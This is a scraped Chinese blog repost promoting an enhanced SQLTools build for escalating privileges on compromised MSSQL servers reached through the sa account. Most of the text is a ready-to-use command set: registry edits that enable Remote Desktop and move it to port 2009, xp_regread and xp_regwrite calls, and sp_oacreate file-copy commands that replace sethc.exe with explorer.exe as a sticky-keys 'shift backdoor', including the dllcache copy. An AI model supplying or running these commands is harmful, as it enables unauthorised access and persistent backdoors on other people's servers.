zoukankan      html  css  js  c++  java

  • sqltools最新增强版

    此版本集成了更多的1433服务器恢复提权命令功能,对于目前sa口令许多的功能限制能有效的恢复.

    如果此版本不能恢复的,建议可以考虑放弃该服务器的提权.版权为原作者所有,特此声明

    命令集成功能说明:

    查看系统信息

    systeminfo

    查看系统终端端口状况

    REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server\WinStations\RDP-Tcp /v PortNumber

    开启系统终端端口

    REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
    下面两条更改终端端口为2009

    REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server\Wds\rdpwd\Tds\tcp /v PortNumber /t

    REG_DWORD /d 0x7d9 /f

    REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server\WinStations\RDP-Tcp /v PortNumber /t

    REG_DWORD /d 0x7d9 /f
    1、更改软件SQL命令处的Edit控件为ComboBox控件,增加下拉菜单功能,方便存储更多的相关命令

    2、菜单功能命令增加部分

    查看系统相关信息
    EXEC xp_msver
    查询终端端口信息
    exec master..xp_regread ‘HKEY_LOCAL_MACHINE’,'SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp’,'PortNumber’
    开启终端端口
    xp_regwrite ‘HKEY_LOCAL_MACHINE’, ‘SYSTEM\CurrentControlSet\Control\Terminal Server’, ‘fDenyTSConnections’,'REG_DWORD’,0
    复制explorer为shift后门
    declare @o int exec sp_oacreate ‘scripting.filesystemobject’, @o out exec sp_oamethod @o, ‘copyfile’,null,’c:\windows\explorer.exe’,'c:\windows\system32\sethc.exe’;
    declare @oo int exec sp_oacreate ‘scripting.filesystemobject’, @oo out exec sp_oamethod @oo, ‘copyfile’,null,’c:\windows\system32\sethc.exe’,'c:\windows\system32\dllcache\sethc.exe’;

    sqltools深度命令成版
  • 相关阅读:
    对var和let作用域用闭包的特性做最好的解释
    Js函数作用域
    问题记录
    Git学习
    React-router BrowserRouter导致axios请求时会重复url中的某些字段
    leetcode python 032 识别最长合法括号
    leetcode python 030 Substring with Concatenation of All Words
    n阶楼梯,一次走1,2,3步,求多少种不同走法
    leetcode python 012 hard 合并k个有序链表
    leetcode python 011
  • 原文地址:https://www.cnblogs.com/94YY/p/2048711.html
Copyright © 2011-2022 走看看